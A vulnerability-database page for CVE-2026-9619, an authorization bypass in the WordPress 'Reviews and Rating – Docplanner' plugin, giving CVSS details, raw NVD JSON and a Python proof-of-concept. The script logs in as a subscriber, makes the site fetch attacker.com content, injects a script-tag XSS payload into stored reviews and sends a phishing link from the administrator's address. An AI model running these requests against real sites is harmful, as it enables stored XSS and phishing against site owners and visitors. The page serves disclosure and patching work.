Security Vulnerability Report
中文
CVE-2026-9619 CVSS 4.3 MEDIUM

CVE-2026-9619

Published: 2026-06-24 07:16:30
Last Modified: 2026-06-25 13:26:12

Description

The Reviews and Rating – Docplanner plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.1.4. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to trigger outbound scraping of external websites and write scraped review data into the wp_dp_reviews database table, as well as send feature-request emails from the site administrator's email address.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Reviews and Rating – Docplanner <= 1.1.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-9619 - Reviews and Rating Docplanner Plugin Authorization Bypass PoC # This PoC demonstrates how a subscriber-level user can trigger outbound scraping, # write to wp_dp_reviews table, and send emails as administrator. import requests # Target WordPress site with vulnerable plugin (version <= 1.1.4) target_url = "http://target-wordpress-site.com" # Authenticate as a subscriber-level user session = requests.Session() login_data = { "log": "subscriber_username", "pwd": "subscriber_password", "wp-submit": "Log In", "redirect_to": target_url + "/wp-admin/", "testcookie": "1" } session.post(target_url + "/wp-login.php", data=login_data) # Step 1: Trigger outbound scraping to an attacker-controlled server # This exploits the missing authorization check in the scraping function scrape_data = { "action": "dp_review_scrape", "external_url": "http://attacker.com/malicious_reviews.html", "doctor_id": "1" } response = session.post(target_url + "/wp-admin/admin-ajax.php", data=scrape_data) print("Scrape response:", response.text) # Step 2: Write scraped/malicious data into wp_dp_reviews table write_data = { "action": "dp_save_review", "review_content": "<script>alert('XSS-via-CVE-2026-9619')</script>", "reviewer_name": "Attacker", "rating": "5" } response = session.post(target_url + "/wp-admin/admin-ajax.php", data=write_data) print("Write review response:", response.text) # Step 3: Send email as the site administrator email_data = { "action": "dp_send_feature_request", "email_subject": "Urgent: Action Required", "email_body": "<a href='http://attacker.com/phishing'>Click here</a>", "recipient": "[email protected]" } response = session.post(target_url + "/wp-admin/admin-ajax.php", data=email_data) print("Send email response:", response.text)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-9619", "sourceIdentifier": "[email protected]", "published": "2026-06-24T07:16:29.850", "lastModified": "2026-06-25T13:26:11.740", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Reviews and Rating – Docplanner plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.1.4. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to trigger outbound scraping of external websites and write scraped review data into the wp_dp_reviews database table, as well as send feature-request emails from the site administrator's email address."}], "affected": [{"source": "[email protected]", "affectedData": [{"vendor": "berfect", "product": "Reviews and Rating – Docplanner", "defaultStatus": "unaffected", "versions": [{"version": "0", "lessThanOrEqual": "1.1.4", "versionType": "semver", "status": "affected"}]}]}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}], "ssvcV203": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "ssvcData": {"timestamp": "2026-06-24T12:16:04.609547Z", "id": "CVE-2026-9619", "options": [{"exploitation": "none"}, {"automatable": "no"}, {"technicalImpact": "partial"}], "role": "CISA Coordinator", "version": "2.0.3"}}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/reviews-and-rating-docplanner/tags/1.1.4/classes/class-reviews-and-rating-docplanner.php#L301", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/reviews-and-rating-docplanner/tags/1.1.4/classes/class-reviews-and-rating-docplanner.php#L369", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/reviews-and-rating-docplanner/tags/1.1.4/classes/class-reviews-and-rating-docplanner.php#L401", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/reviews-and-rating-docplanner/tags/1.1.4/classes/class-reviews-and-rating-docplanner.php#L410", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/reviews-and-rating-docplanner/tags/1.1.4/classes/class-reviews-and-rating-docplanner.php#L81", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5f71c834-15ee-48ea-8f8d-6ea4b72a14d8?source=cve", "source": "[email protected]"}]}}